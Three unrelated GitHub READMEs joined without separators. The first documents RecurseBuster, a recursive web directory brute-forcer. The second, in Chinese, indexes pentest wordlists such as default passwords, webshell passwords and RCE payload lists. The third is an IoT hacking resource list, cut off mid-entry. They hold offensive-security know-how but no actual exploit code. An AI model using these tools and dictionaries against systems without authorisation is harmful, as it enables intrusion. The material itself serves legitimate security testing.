# RecurseBuster [![Go Basic Checks](https://goreportcard.com/badge/github.com/c-sto/recursebuster)](https://goreportcard.com/report/github.com/c-sto/recursebuster) ![screengrab of tool running](screen.gif "Test") It's like gobuster, but recursive! I wanted a recursive directory brute forcer that was fast, and had certain features (like header blacklisting, and recursion). It didn't exist, so I started writing this. In reality, I'll probably merge a lot of the functionality into github.com/swarley7/gograbber since that solves a similar problem and has cool features that I don't want to implement (phantomjs, ugh). For now, it will do. ## Installation Ye olde go get install should work. Same command to update: ``` go get -u github.com/c-sto/recursebuster ``` Important releases will also be tagged and uploaded. **NOTE** Since tagged releases have started, some old versions which have been obtained with `go get -u` seem to be broken. Removing the folder and starting again seems to work: ``` rm -rf $GOPATH/src/github.com/c-sto/recursebuster rm $GOPATH/bin/recursebuster go get -u github.com/c-sto/recursebuster ``` ## Usage I wanted it to be fairly straightforward, but scope creep etc. Basic usage is just like gobuster: ``` recursebuster -u https://google.com -w wordlist.txt ``` This will run a recursive-HEAD-spider-assisted search with a single thread on google.com using the wordlist specified above. Results will print to screen, but more importantly, will be written to a file 'busted.txt'. ## Features ### HEAD Based Checks For servers the support it, HEAD based checks speed up content discovery considerably, since no body is required to be transferred. The default logic is to use a HEAD request to determine if something exists. If it seems to exist, a GET is sent to retrieve and verify. If there are sensitive pages that perform actions (AKA, ones that don't really follow the HTTP Verb Spec), a file containing a list of *exact* URLS that should not requested can be blacklisted with the `-blacklist` flag. ### Recursion When a directory is identified, it gets added to the queue to be brute-forced. By default, one directory is brute-forced at a time, however you can 'cancel' a directory interactively by hitting 'ctrl+x' if in UI mode. If you're not in UI mode (`-noui`), you need to have added the directory to the blacklist. ### Spider Assistance Since we are getting the page content anyway, why not use it to our advantage? Some basic checks are done to look for links within the HTML response. The links are added, and any directories identified added too. By default, only the supplied host is whitelisted, so any links that go off-site (rather, to a different domain) are ignored. You can specify a file that contains a list of whitelisted domains that you are OK with including into the spider with the `-whitelist` flag. ### Speed Gobuster is pretty fast when you smash `-t 200`, but who would do that? One of my goals for this was to keep performance on-par with gobuster where possible. On most webservers, recursebuster seems to be faster, even though it sends both a HEAD and a GET request. This means you will hit WAF limits really quickly, and is why by default it's `-t 1`. ### Proxy options The ability to use a proxy is fairly useful in several situations. Not having to drop tools on a host in order to scan through it is always useful - recursebuster also works through burp if you specify it as a http proxy. When using Recursebuster to supplement the burp sitemap - use the `-stitemap` option to send _only_ the 'found' or interesting responses to burp, this should help avoid filling up your HTTP History with 404's. ## Usage args Idk why you might want these, just run it with `-h 2>&1` and grep for the keyword. Here they are anyway: ``` -ajax Add the X-Requested-With: XMLHttpRequest header to all requests -all Show, and write the result of all checks -appendslash Append a / to all directory bruteforce requests (like extension, but slash instead of .yourthing) -auth string Basic auth. Supply this with the base64 encoded portion to be placed after the word 'Basic' in the Authorization header. -bad string Responses to consider 'bad' or 'not found'. Comma-separated. This works the opposite way of gobuster! (default "404") -badheader value Check for presence of this header. If an exact match is found, the response is considered bad.Supply as key:value. Can specify multiple - eg '-badheader Location:cats -badheader X-ATT-DeviceId:XXXXX' -blacklist string Blacklist of prefixes to not check. Will not check on exact matches. -canary string Custom value to use to check for wildcards -clean Output clean URLs to the output file for easy loading into other tools and whatnot. -cookies string Any cookies to include with requests. This is smashed into the cookies header, so copy straight from burp I guess. -debug Enable debugging -ext string Extensions to append to checks. Multiple extensions can be specified, comma separate them. -headers value Additional headers to include with request. Supply as key:value. Can specify multiple - eg '-headers X-Forwarded-For:127.0.01 -headers X-ATT-DeviceId:XXXXX' -https Use HTTPS instead of HTTP. -iL string File to use as an input list of URL's to start from -k Ignore SSL check -len Show, and write the length of the response -methods string Methods to use for checks. Multiple methods can be specified, comma separate them. Requests will be sent with an empty body (unless body is specified) (default "GET") -nobase Don't perform a request to the base URL -noget Do not perform a GET request (only use HEAD request/response) -nohead Don't optimize GET requests with a HEAD (only send the GET) -norecursion Disable recursion, just work on the specified directory. Also disables spider function. -nospider Don't search the page body for links, and directories to add to the spider queue. -nostartstop Don't show start/stop info messages -nostatus Don't print status info (for if it messes with the terminal) -noui Don't use sexy ui -nowildcard Don't perform wildcard checks for soft 404 detection -o string Local file to dump into (default "./busted.txt") -proxy string Proxy configuration options in the form ip:port eg: 127.0.0.1:9050. Note! If you want this to work with burp/use it with a HTTP proxy, specify as http://ip:port -ratio float Similarity ratio to the 404 canary page. (default 0.95) -redirect Follow redirects -sitemap Send 'good' requests to the configured proxy. Requires the proxy flag to be set. ***NOTE: with this option, the proxy is ONLY used for good requests - all other requests go out as normal!*** -t int Number of concurrent threads (default 1) -timeout int Timeout (seconds) for HTTP/TCP connections (default 20) -u string Url to spider -ua string User agent to use when sending requests. (default "RecurseBuster/1.5.11") -v int Verbosity level for output messages. -version Show version number and exit -w string Wordlist to use for bruteforce. Blank for spider only -whitelist string Whitelist of domains to include in brute-force ``` Credits: OJ/TheColonial: Hack the planet!!!! Swarley: Hack the planet!!!!! Hackers: Hack the planet!!!!
# Dictionary-Of-Pentesting ## 简介 收集一些常用的字典,用于渗透测试、SRC漏洞挖掘、爆破、Fuzzing等实战中。 收集以实用为原则。目前主要分类有认证类、文件路径类、端口类、域名类、无线类、正则类。 涉及的内容包含设备默认密码、文件路径、通用默认密码、HTTP参数、HTTP请求头、正则、应用服务默认密码、子域名、用户名、系统密码、Wifi密码等。 该项目计划持续收集。 ## 更新记录 **2022.07.16** 1. k8s 路径 2. phpunit路径 3. properties 文件路径字典 4. yaml文件名字典 5. 用户名字段名称字典 **2022.05.08** 1. 增加 keys/secret 正则表达式 2. 增加Dom XSS sink **2021.12.14** 1. 增加EyeWitness的识别规则 **2021.10.04** 1. 增加Burp的Software Version Checks的识别规则 2. 增加Client-Side Prototype Pollution的规则(基于Burp的Software Version Checks插件) **2021.09.22** 1. 增加MQTT 爆破用的用户名和密码。 **2021.08.01** 1. 增加100余条CND列表 2. 系统命令执行Fuzzing payload **2021.07.30** 1. 增加19个cdn服务列表。 感谢@leveryd 提供 **2021.07.26** 1. 增加一个子域名爆破字典 **2021.06.23** 1. 一些开源Web应用的ViewState默认key。 2. upload 一些上传文件的参数名 **2021.06.18** 1. 增加Bug-Bounty-Wordlists **2021.06.06** 1. 增加SuperWordlist的用户名和密码字典。包括Tomcat、PMA、DEV等密码字典,还有CN、EN邮箱用户名、TOP20管理用户名。 2. 200万子域名字典 **2021.06.02** 1. 增加43个云waf或cdn列表 **2021.05.28** 1. 增加wappalyzer的指纹规则 **2021.04.28** 1. XXE payloads for specific DTDs **2021.04.26** 1. 增加云厂商的metadata有用的一些地址。(包含AWS、Google Cloud、Digital Ocean 、Packetcloud、Azure、Oracle Cloud 、Alibaba、OpenStack/RackSpace 、Oracle Cloud、Kubernetes) **2021.02.19** 1. 增加aem路径列表 **2021.02.07** 1. 增加top25 漏洞参数(SQLI/XSS/RCE/OPENREDIRECT/LFI/SSRF) **2021.02.04** 1. 增加all.txt 字典。 **2021.02.03** 1. 增加amass的子域名字典。 **2021.01.31** 1. 增加AllAboutBugBounty项目的文档 **2021.01.27** 1. 增加几个可能导致RCE的端口 **2021.01.24** 1. 增加两个github dork **2021.01.16** 1. 增加cve的一些路径 2. 一些已知错误配置的路径 3. 一些API端点或服务器信息的特殊路径 4. 以上3种的合集(去重后) **2021.01.13** 1. 增加callback参数字典 2. 增加常见报错信息字符串列表 3. 增加debug参数字典 4. 增加snmp密码字典 5. 增加weblogic常见用户名密码 6. 增加oracle用户名、密码字典 **2021.01.04** 1. 增加DefaultCreds-cheat-sheet **2021.01.03** 1. 增加crackstation下载地址(由于字典太大,给出下载链接)。 2. 增加rockyou字典。 3. 增加cain字典。 **2021.01.02** 1. 增加webshell密码字典 2. 增加7w和81万请求参数字典 3. 增加Lcoalhost地址字典 4. HTML标签列表 **2020.12.31** 1. 增加域账户弱密码字典(7000+) **2020.12.30** 1. 增加ntlm验证的路径 **2020.12.15** 1. 增加github dork的搜索脚本。 **2020.12.09** 1. 增加CEH web services的用户名和密码字典。 **2020.12.07** 1. 增加oracle路径列表 **2020.11.23** 1. 增加ctf字典。 2. 增加摄像rtsp默认路径和默认用户名和密码 **2020.11.14** 1. 增加1个ics 默认密码字典 2. 增加1个设备默认密码字典(3400余条) **2020.11.04** 1. 增加 Wordpress BruteForc List **2020.11.03** 1. 增加几个默认口令 **2020.10.15** 1. 增加一些payload **2020.09.30** 1. 增加常见可以RCE的端口 **2020.09.29** 1. bugbounty oneliner rce 2. 一些默认路径 3. top 100k 密码字典 4. top 5k 用户名字典 5. 一些代码审计正则表达式 **2020.09.27** 1. 增加cms识别指纹规则集,包含 fofa/Wappalyzer/WEBEYE/web中间件/开发语言 等众多指纹库内容 **2020.09.22** 1. 修改swagger字典,添加5条路径 **2020.09.21** 1. 增加3种类型密码字典,拼音、纯数字、键盘密码字典 2. 增加scada 默认密码,硬编码等列表 **2020.09.18** 1. 增加11k+用户名密码组合 **2020.09.17** 1. 增加action后缀 top 100 2. javascript 中on事件列表 3. URL 16进制fuzz **2020.09.15** 1. 增加XXE bruteforce wordlist 2. 增加sql备份文件名字典 3. 删除重复的spring boot内容 **2020.09.10** 1. 增加自己收集的webservices内容。包含webservices目录,文件名,拓展名。后续计划增加存在漏洞webservices路径内容 2. readme中增加更新历史 **2020.09.09** 1. 增加weblogic路径 2. 增加swagger路径 3. 增加graphql路径 4. 增加spring-boot路径 5. 去掉device/default_password_list.txt文件中的空行 **2020.09.08** 1. 更新jsFileDict.txt字典,增加4个js文件名 **2020.09.07** 1. 添加绕过ip限制的http请求投 2. 修改readme.md **2020.08.29** 1. 增加常见设备、安全产品默认口令 2. 增加一行命令的BugBounty tips 3. 增加两处参数字典 4. 增加bruteforce-lists的字典 5. Readme 文件增加来源。逐渐完善。 **2020.08.28** 1. 增加api路径 2. 增加js文件路径 3. 增加http请求参数 4. 增加http请求参数值 **2020.08.27** 1. 删除一些多余文件 2. 精简Files下的dict的层级 3. 增加DirBuster字典 4. 增加spring boot actuator字典 **2020.08.26** 首次提交 ## 来源&致谢 该项目内容均来源于网络或自己整理,感谢各位大佬们的共享精神和辛苦付出~ * [https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/internetwache/CT_subdomains](https://github.com/internetwache/CT_subdomains) * [https://github.com/lijiejie/subDomainsBrute](https://github.com/lijiejie/subDomainsBrute) * [https://github.com/shmilylty/OneForAll](https://github.com/shmilylty/OneForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) * [https://github.com/dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty) * [https://github.com/OfJAAH/KingOfBugBountyTips](https://github.com/OfJAAH/KingOfBugBountyTips) * [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * [https://github.com/TheKingOfDuck/fuzzDicts](https://github.com/TheKingOfDuck/fuzzDicts) * [https://github.com/NS-Sp4ce/Dict](https://github.com/NS-Sp4ce/Dict) * [https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun) * [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * [https://github.com/YasserGersy/Enums/](https://github.com/YasserGersy/Enums/) * [https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf](https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf) * [https://twitter.com/DanielAzulay18/status/1304751830539395072](https://twitter.com/DanielAzulay18/status/1304751830539395072) * [https://github.com/cwkiller/Pentest_Dic](https://github.com/cwkiller/Pentest_Dic) * [https://github.com/huyuanzhi2/password_brute_dictionary](https://github.com/huyuanzhi2/password_brute_dictionary) * [https://github.com/Clear2020/icsmaster/](https://github.com/Clear2020/icsmaster/) * [https://github.com/LandGrey/SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit) * [https://github.com/al0ne/Vxscan][https://github.com/al0ne/Vxscan] * [https://github.com/L0kiii/FofaScan](https://github.com/L0kiii/FofaScan) * [https://github.com/nw01f/CmsIdentification-masterV2](https://github.com/nw01f/CmsIdentification-masterV2) * [https://github.com/Lucifer1993/cmsprint](https://github.com/Lucifer1993/cmsprint) * [https://github.com/erwanlr/Fingerprinter](https://github.com/erwanlr/Fingerprinter) * [https://github.com/lewiswu1209/fingerprint](https://github.com/lewiswu1209/fingerprint) * [https://github.com/shelld3v/RCE-python-oneliner-payload](https://github.com/shelld3v/RCE-python-oneliner-payload) * [https://twitter.com/ptswarm/status/1311310897592315905](https://twitter.com/ptswarm/status/1311310897592315905) * [https://github.com/xer0days/BugBounty](https://github.com/xer0days/BugBounty) * [https://twitter.com/ptswarm/status/1323266632920256512](https://twitter.com/ptswarm/status/1323266632920256512) * [https://github.com/kongsec/Wordpress-BruteForce-List/](https://github.com/kongsec/Wordpress-BruteForce-List/) * [https://github.com/nyxxxie/awesome-default-passwords](https://github.com/nyxxxie/awesome-default-passwords) * [https://github.com/arnaudsoullie/ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) * [https://github.com/pwnfoo/NTLMRecon](https://github.com/pwnfoo/NTLMRecon) * [https://github.com/chroblert/domainWeakPasswdCheck](https://github.com/chroblert/domainWeakPasswdCheck/) * [https://github.com/gh0stkey/Web-Fuzzing-Box](https://github.com/gh0stkey/Web-Fuzzing-Box) * [https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [https://github.com/ihebski/DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [https://github.com/epony4c/Exploit-Dictionary](https://github.com/epony4c/Exploit-Dictionary) * [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths) * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) * [https://github.com/daffainfo/AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) * [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass) * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://github.com/lutfumertceylan/top25-parameter](https://github.com/lutfumertceylan/top25-parameter) * [https://github.com/clarkvoss/AEM-List](https://github.com/clarkvoss/AEM-List) * [https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb](https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb) * [https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md](https://raw.githubusercontent.com/GoSecure/dtd-finder/master/list/xxe_payloads.md) * [https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json](https://raw.githubusercontent.com/AliasIO/wappalyzer/master/src/technologies.json) * [https://github.com/fuzz-security/SuperWordlist](https://github.com/fuzz-security/SuperWordlist) * [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) * [https://github.com/yuanhaiGreg/Fuzz-Dict](https://github.com/yuanhaiGreg/Fuzz-Dict) * [https://github.com/MistSpark/DNS-Wordlists](https://github.com/MistSpark/DNS-Wordlists) * [https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf](https://github.com/0x727/ShuiZe_0x727/blob/master/Plugins/infoGather/subdomain/CDN/cdn-domain.conf) * [https://github.com/omurugur/OS_Command_Payload_List](https://github.com/omurugur/OS_Command_Payload_List) * [https://github.com/akamai-threat-research/mqtt-pwn](https://github.com/akamai-threat-research/mqtt-pwn) * [https://github.com/BlackFan/cspp-tools](https://github.com/BlackFan/cspp-tools) * [https://github.com/augustd/burp-suite-software-version-checks](https://github.com/augustd/burp-suite-software-version-checks) * [https://github.com/FortyNorthSecurity/EyeWitness/](https://github.com/FortyNorthSecurity/EyeWitness/) * [https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59](https://gist.github.com/h4x0r-dz/be69c7533075ab0d3f0c9b97f7c93a59) * [https://github.com/Karanxa/Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)
![](https://github.com/V33RU/IoTSecurity101/blob/master/github%20(1).png) ![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg) - A Collection for IoT Security Resources - You are welcome to fork and [contribute](https://github.com/V33RU/IoTSecurity101/blob/master/contributors.md#contributors) - Other Interesting Areas - [ICS-Security](https://github.com/V33RU/IoTSecurity101/blob/master/ICS/Industrial%20Control%20Systems.md) - [Automotive-Security](https://github.com/V33RU/IoTSecurity101/blob/master/Automotive/Automotive-security.md) ******************************************************************************************************************************** #### Approach Methodology - ***1. Network*** - ***2. Web (Front & Backend and Web services)*** - ***3. Mobile App (Android & iOS)*** - ***4. Wireless Connectivity (Zigbee , WiFi , Bluetooth , etc)*** - ***5. Firmware Pentesting (OS of IoT Devices)*** - ***6. Hardware Hacking & Fault Injections & SCA Attacks*** - ***7. Storage Medium*** - ***8. I/O Ports*** ## Contents - IoT Security information - [IoT Security Chat groups](#chat-groups-for-iot-security) - [IoT and Hardware Security Trainings](#iot-and-hardware-security-trainings) - [Books](#books-for-iot-pentesting) - [Blogs](#blogs-for-iotpentest) - [Cheatsheets](#awesome-cheatsheets) - [Search Engines](#search-engines-for-exposed-iot-devices-worldwide) - [CTF](#ctf-for-iot-and-embeddded) - [Youtube](#youtube-channels-for-iot-pentesting) - [Exploitation Tools](#exploitation-tools) - [IoT Pentesting OSes](#iot-pentesting-oses) - [IoT Vulnerabilites Checking Guides](#iot-vulnerabilites-checking-guides) - [IoT Labs](#vulnerable-iot-and-hardware-applications) - [Awesome IoT Pentesting Guides](#awesome-iot-pentesting-guides) - [Fuzzing Things](#fuzzing-things) - [IoT Lab Setup guide for corporate/individual](https://github.com/IoT-PTv/IoT-Lab-Setup) - [FlipperZero](#flipperzero) - Network - Web IoT Message Protocols - [MQTT](#mqtt) - [CoAP](#coap) - Mobile app - [Mobile security (Android & iOS)](#mobile-security-android--ios) - Wireless Protocols - [RADIO HACKING STARTING GUIDE](#Radio-Hacker-Quick-Start-Guide) - [Cellular Hacking GSM BTS](#cellular-hacking-gsm-bts) - [Zigbee](#zigbee-aLL-stuff) - [Bluetooth](#ble-intro-and-sw-hw-tools-to-pentest) - [DECT](#dect-digital-enhanced-cordless-telecommunications) - Firmware - [Reverse Engineering Tools](#reverse-engineering-tools) - [Online Assemblers](#online-assemblers) - [ARM](#arm) - [Pentesting Firmwares and emulating and analyzing](#pentesting-firmwares-and-emulating-and-analyzing) - [Firmware samples to pentest](#firmware-samples-to-pentest) - [Secureboot](#secureboot) - Hardware - [IoT Hardware Intro](#iot-hardware-overview-and-hacking) - [IoT Hardware hacking Intro] - [Required hardware to pentest IoT](#hardware-gadgets-to-pentest) - [Hardware interfaces](#attacking-hardware-interfaces) - [SPI](#spi) - [UART](#uart) - [JTAG](#jtag) - [SideChannel Attacks & Glitching attacks](#sidechannel-attacks) - [Glitching Attacks](#glitching-attacks) - Storage Medium - [EMMC Hacking](#emmc-hacking) - Payment Security - [ATM Hacking](#ATM-Hacking) ******************************************************************************************************************************** ### To seen Hacked devices - https://blog.exploitee.rs/2018/10/ - https://www.exploitee.rs/ - https://forum.exploitee.rs/ - [Your Lenovo Watch X Is Watching You & Sharing What It Learns](https://www.checkmarx.com/blog/lenovo-watch-watching-you/) - [Your Smart Scale is Leaking More than Your Weight: Privacy Issues in IoT](https://www.checkmarx.com/blog/smart-scale-privacy-issues-iot/) - [Smart Bulb Offers Light, Color, Music, and… Data Exfiltration?](https://www.checkmarx.com/blog/smart-bulb-exfiltration/) - [Besder-IPCamera analysis](http://blog.0x42424242.in/2019/04/besder-investigative-journey-part-1_24.html) - [Smart Lock](https://blog.rapid7.com/2019/08/01/r7-2019-18-multiple-hickory-smart-lock-vulnerabilities/) - [Subaru Head Unit Jailbreak](https://github.com/sgayou/subaru-starlink-research/blob/master/doc/README.md) - [Jeep Hack](http://illmatics.com/Remote%20Car%20Hacking.pdf) - [Dropcam hacking](https://www.defcon.org/images/defcon-22/dc-22-presentations/Moore-Wardle/DEFCON-22-Colby-Moore-Patrick-Wardle-Synack-DropCam-Updated.pdf) - [Printer Hacking live sessions - gamozolabs](https://www.youtube.com/watch?v=2LVtEoQA8Qo&ab_channel=gamozolabs) - [LED Light Hacking](https://youtu.be/Nnb2ct3hc68) ******************************************************************************************************************************** - [IoT-Vuln-with CVE and PoC of tenda and dlink](https://github.com/z1r00/IOT_Vul) ******************************************************************************************************************************** ### Chat groups for IoT Security - IoTSecurity101 Telegram - <https://t.me/iotsecurity1011> - IoTSecurity101 Reddit - <https://www.reddit.com/r/IoTSecurity101/> - IoTSecurity101 Discord - <https://discord.gg/EH9dxT9> - hardware hacking Telegram - <https://t.me/hardwareHackingBrasil> - RFID Discord group - <https://discord.gg/Z43TrcVyPr> - ICS Discord group - <https://discord.com/invite/CmDDsFK> ******************************************************************************************************************************** ### IoT and Hardware Security Trainings - [opensecuritytraining 2](https://p.ost2.fyi/courses) ******************************************************************************************************************************** ### Books For IoT Pentesting - [The Firmware Handbook (Embedded Technology) 1st Edition by Jack Ganssle ](https://www.amazon.com/Firmware-Handbook-Embedded-Technology/dp/075067606X) - 2004 - [Hardware Hacking: Have Fun while Voiding your Warranty 1st Edition ](https://www.elsevier.com/books/hardware-hacking/grand/978-1-932266-83-2) - 2004 - [Linksys WRT54G Ultimate Hacking 1st Edition by Paul Asadoorian](https://www.amazon.com/Linksys-WRT54G-Ultimate-Hacking-Asadoorian/dp/1597491667) - 2007 - [Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp , Raj Samani](https://www.amazon.com/Applied-Cyber-Security-Smart-Grid/dp/1597499986/) -2013 - [Hacking the Xbox-An Introduction to Reverse Engineering HACKING THE XBOX by Andrew “bunnie” Huang](https://www.nostarch.com/xboxfree) - Openbook - 2013 - [Android Hacker's Handbook by Joshua J. Drake](https://www.amazon.in/Android-Hackers-Handbook-MISL-WILEY-Joshua/dp/812654922X) - 2014 - [The Art of Pcb Reverse Engineering: Unravelling the Beauty of the Original Design ](https://www.amazon.in/Art-Pcb-Reverse-Engineering-Unravelling/dp/1499323441) - 2015 - [Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts 1st Edition, by Nitesh Dhanjani](https://www.amazon.in/Abusing-Internet-Things-Blackouts-Freakouts-ebook/dp/B013VQ7N36) - 2015 - [Learning Linux Binary Analysis By Ryan "elfmaster" O'Neill](https://www.packtpub.com/networking-and-servers/learning-linux-binary-analysis) - 2016 - [Car hacker's handbook by Craig Smith](http://opengarages.org/handbook) - 2016 - [IoT Penetration Testing Cookbook By Aaron Guzman , Aditya Gupta](https://www.packtpub.com/networking-and-servers/iot-penetration-testing-cookbook) - 2017 - [Inside Radio: An Attack and Defense Guide by Authors: Yang, Qing, Huang, Lin](https://books.google.co.in/books?id=71NSDwAAQBAJ&printsec=copyright&redir_esc=y#v=onepage&q&f=false) -2018 - [Pentest Hardware](https://github.com/unprovable/PentestHardware/) - Openbook -2018 - [Gray Hat Hacking: The Ethical Hacker's Handbook, Fifth Edition 5th Edition by by Daniel Regalado , Shon Harris , Allen Harper , Chris Eagle , Jonathan Ness , Branko Spasojevic , Ryan Linn , Stephen Sims](https://www.amazon.in/Gray-Hat-Hacking-Ethical-Handbook-ebook/dp/B07D3J9J4H) - 2018 - [Practical Hardware Pentesting](https://www.packtpub.com/product/practical-hardware-pentesting/9781789619133?_ga=2.224205017.333884789.1668314814-101815837.1668314814) - 2021 - [Manual PCB-RE: The Essentials](https://www.amazon.com/Manual-PCB-RE-Essentials-Keng-Tiong/dp/B0974Z3NDS) - [The Hardware Hacking Handbook: Breaking Embedded Security with Hardware Attacks Front Cover Jasper van Woudenberg, Colin O'Flynn](https://books.google.co.in/books?id=DEqatAEACAAJ&source=gbs_navlinks_s) - 2021 - [Practical IoT Hacking-The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Woods](https://nostarch.com/practical-iot-hacking) - 2021 - [Internet of Things Security Encyclopedia](https://iot-security.wiki/) - Openbook - [PatrIoT: practical and agile threat research for IoT by Emre Süren](https://link.springer.com/article/10.1007/s10207-022-00633-3) - 2022 - [Practical Hardware Pentesting - Second Edition](https://www.packtpub.com/product/practical-hardware-pentesting-second-edition/9781803249322) - 2023 - [Blue Fox: Arm Assembly Internals & Reverse Engineering](https://www.wiley.com/en-gb/Blue+Fox%3A+Arm+Assembly+Internals+%26+Reverse+Engineering-p-9781119745303) - 2023 - [Fuzzing Against the Machine: Automate vulnerability research with emulated IoT devices on QEMU](https://www.packtpub.com/product/fuzzing-against-the-machine/9781804614976) - 2023 - [Hardware Security Training, Hands-on!](https://link.springer.com/book/10.1007/978-3-031-31034-8) - 2023 ******************************************************************************************************************************** ### Blogs for iotpentest - https://jilles.com/ - https://payatu.com/blog/ - https://raelize.com/blog/ - http://jcjc-dev.com/ - https://w00tsec.blogspot.in/ - http://www.devttys0.com/ - https://wrongbaud.github.io/ - https://embeddedbits.org/ - https://www.rtl-sdr.com/ - https://keenlab.tencent.com/en/ - https://courk.cc/ - https://iotsecuritywiki.com/ - https://cybergibbons.com/ - http://firmware.re/ - http://blog.k3170makan.com/ - https://blog.tclaverie.eu/ - http://blog.besimaltinok.com/category/iot-pentest/ - https://ctrlu.net/ - http://iotpentest.com/ - https://blog.attify.com - https://duo.com/decipher/ - http://www.sp3ctr3.me - http://blog.0x42424242.in/ - https://dantheiotman.com/ - https://blog.danman.eu/ - https://quentinkaiser.be/ - https://blog.quarkslab.com - https://blog.ice9.us/ - https://labs.f-secure.com/ - https://mg.lol/blog/ - https://cjhackerz.net/ - https://github.com/sponsors/bunnie/ - https://iotmyway.wordpress.com/ - https://www.synacktiv.com/publications.html - http://blog.cr4.sh/ - https://ktln2.org/ - https://naehrdine.blogspot.com/ - https://limitedresults.com/ - https://fail0verflow.com/blog/ - https://www.exploitsecurity.io/blog ******************************************************************************************************************************** ### Awesome CheatSheets - [Hardware Hacking](https://github.com/arunmagesh/hw_hacking_cheatsheet) - [Nmap](https://github.com/gnebbia/nmap_tutorial) ******************************************************************************************************************************** ### Search Engines for Exposed IoT devices worldwide - [Shodan](https://www.shodan.io/) - [FOFA](https://fofa.so/?locale=en) - [Censys](https://censys.io/) - [Zoomeye](https://www.zoomeye.org/about) - [ONYPHE](https://www.onyphe.io/) ******************************************************************************************************************************** ### CTF For IoT And Embeddded - https://github.com/hackgnar/ble_ctf - https://www.microcorruption.com/ - https://github.com/Riscure/Rhme-2016 - https://github.com/Riscure/Rhme-2017 - https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html - https://github.com/scriptingxss/IoTGoat ******************************************************************************************************************************** ### YouTube Channels for IoT Pentesting - [Joe Grand](https://www.youtube.com/@JoeGrand) - [Liveoverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Binary Adventure](https://www.youtube.com/channel/UCSLlgiYtOXZnYPba_W4bHqQ) - [EEVBlog](https://www.youtube.com/user/EEVblog) - [Craig Smith](https://www.youtube.com/channel/UCxC8G4Oeed4N0-GVeDdFoSA) - [iotpentest [Mr-IoT]](https://www.youtube.com/channel/UCe2mJv2FPRFhYJ7dvNdYR4Q) - [Besim ALTINOK - IoT - Hardware - Wireless](https://www.youtube.com/channel/UCnIV7A3kDL4JXJEljpW6TRQ/playlists) - [Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) - [Cyber Gibbons](https://www.youtube.com/channel/UC_IYERSoSwdR7AA5P41mYTA) - [Scanline](https://www.youtube.com/channel/UCaEgw3321ct_PE4PJvdhXEQ) - [Aaron Christophel](https://www.youtube.com/c/12002230/videos) - [Valerio Di Giampietro](https://www.youtube.com/c/MakeMeHack) ******************************************************************************************************************************** ### Vehicle Security Resources - https://github.com/jaredthecoder/awesome-vehicle-security ******************************************************************************************************************************** ### IoT Vulnerabilites Checking Guides - [Reflecting upon OWASP TOP-10 IoT Vulnerabilities](https://embedi.org/blog/reflecting-upon-owasp-top-10-iot-vulnerabilities/) - [OWASP IoT Top 10 2018 Mapping Project](https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/) - [Hardware toolkits for IoT security analysis](https://defcon-nn.ru/0x0B/Hardware%20toolkits%20for%20IoT%20security%20analysis.pdf) ******************************************************************************************************************************** ### IoT Gateway Software - [Webthings by Mozilla - RaspberryPi](https://iot.mozilla.org/docs/gateway-getting-started-guide.html) ******************************************************************************************************************************** ### IoT Pentesting OSes - [Sigint OS- LTE IMSI Catcher](https://www.sigintos.com/downloads/) - [Instatn-gnuradio OS - For Radio Signals Testing](https://github.com/bastibl/instant-gnuradio) - [AttifyOS - IoT Pentest OS - by Aditya Gupta](https://github.com/adi0x90/attifyos) - [Ubutnu Best Host Linux for IoT's - Use LTS](https://www.ubuntu.com/) - [Internet of Things - Penetration Testing OS v1](https://github.com/IoT-PTv) - [Dragon OS - DEBIAN LINUX WITH PREINSTALLED OPEN SOURCE SDR SOFTWARE](https://www.rtl-sdr.com/dragonos-debian-linux-with-preinstalled-open-source-sdr-software/) - [EmbedOS - Embedded security testing virtual machine](https://github.com/scriptingxss/EmbedOS) - [Skywave Linux- Software Defined Radio for Global Online Listening](https://skywavelinux.com/) - [A Small, Scalable Open Source 